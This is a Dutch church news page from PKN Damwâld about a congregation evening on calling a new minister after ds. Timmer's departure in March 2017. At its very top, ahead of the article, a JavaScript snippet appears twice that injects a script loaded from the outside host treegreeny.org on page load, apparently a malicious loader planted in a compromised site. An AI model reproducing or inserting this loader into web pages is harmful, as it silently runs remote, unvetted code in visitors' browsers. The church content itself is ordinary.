;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Constructieve gemeenteavond Hervormd Akkerwoude c.a. - PKN Damwâld

Constructieve gemeenteavond Hervormd Akkerwoude c.a.

Gepubliceerd op: dinsdag 24 januari 2017

Voor een gemeente met een vacaturetijd in het vooruitzicht breken vaak uitdagende tijden aan. Eén van de uitdagingen waar gemeente en kerkenraad voor komen te staan is het beroepingswerk. Maar hoe doe je dat? En wat willen we nu als gemeente eigenlijk precies? Een bekend spreekwoord luidt niet voor niets ‘Een goed begin is het halve werk’. Vandaar dat de kerkenraad slagvaardig in actie kwam na de aankondiging van het vertrek van onze huidige predikant ds. G. Timmer per 26 maart 2017.

Tijdens de druk bezochte informatieavond van 23 januari informeerde de nieuwe voorzitter van de kerkenraad Wytze Postma de gemeenteleden over alle voorbereidingen die inmiddels getroffen zijn. Hij schetste daarbij het ‘stappenplan’ om een nieuwe predikant te kunnen beroepen en beschreef in grote lijnen wat het proces, de formatie en de werkwijze gaat worden van een nog samen te stellen beroepingscommissie. Uiteraard werd de opgestelde profielschets van een nieuw te beroepen predikant besproken. In grote lijnen komt deze profielschets over één met de profielschets uit 2011, waarmee we in ds. Timmer een uiterst inspirerende, bevlogen, verbindende en betrokken herder en leraar mochten ontvangen.

De benodigde solvabiliteitsverklaring (bewijs van financiële gegoedheid) is inmiddels aangevraagd bij het R.C.B.B.-Noord, er zijn (formeel verplichte) contacten gelegd met (het Breed Moderamen-) van de Classis Dokkum en er is met betrekking tot de ‘zoektocht’ ondersteuning gezocht bij het mobiliteitsbureau van de Protestantse Kerk Nederland. De heer J.Y. van der Wal uit De Westereen is bereid gevonden om per 26 maart als kerkelijk werker het (crisis-) pastoraat in de vacante periode gestalte te geven, dit omdat de werkzaamheden van ds. Timmer per die datum stoppen. Daarnaast is het gebruikelijk dat er in deze periode zonder vaste predikant een consulent wordt aangesteld. Wie dat wordt bepaald niet de gemeente maar het Breed Moderamen van de Classis. Deze consulent-predikant volgt het reilen en zeilen van onze protestante gemeente en ondersteund daar waar nodig. Op het moment van dit schrijven is nog niet bekend wie dit gaat worden. Uiteraard werd er ook nagedacht over het afscheid van de familie Timmer. Een commissie gaat aan de slag om een feestelijk programma (waarbij de bewoners van Nij Tjaerda zeker niet worden vergeten) te ontwikkelen. Wel is reeds bekend dat de afscheidsdienst D.V. op 26 maart 2017 om 09.30 uur in De Ikker zal plaatshebben.

Kortom, veel beweging en ontwikkelingen, maar de zoektocht naar een nieuwe herder en leraar  biedt ook kansen en mogelijkheden. Daarmee is eigenlijk een formele start gegeven aan het beroepingsproces. Ons doel daarbij is het vinden van een predikant die invulling kan geven aan juist die zaken die wij als Hervormd Akkerwoude c.a. belangrijk achten en voor een levend gemeente-zijn in Damwâld van belang zijn. Het zoeken van een nieuwe predikant is niet alleen een taak van de beroepingscommissie, maar ook van de gemeente. Suggesties voor namen van eventuele geschikte predikanten en kandidaten voor de beroepingscommissie zijn dan ook van harte welkom.

We hebben er zin in om er mee aan de slag te gaan. Gemeente zijn doen we met ons allen. Elke bouwsteen is belangrijk. Zo vormen we samen met Christus als hoeksteen de gemeente, ‘Gods tempel’. We mogen daarbij weten dat de Here ons, door zijn Woord en Geest, de weg zal wijzen en daarom leggen wij het beroepingswerk in Gods handen.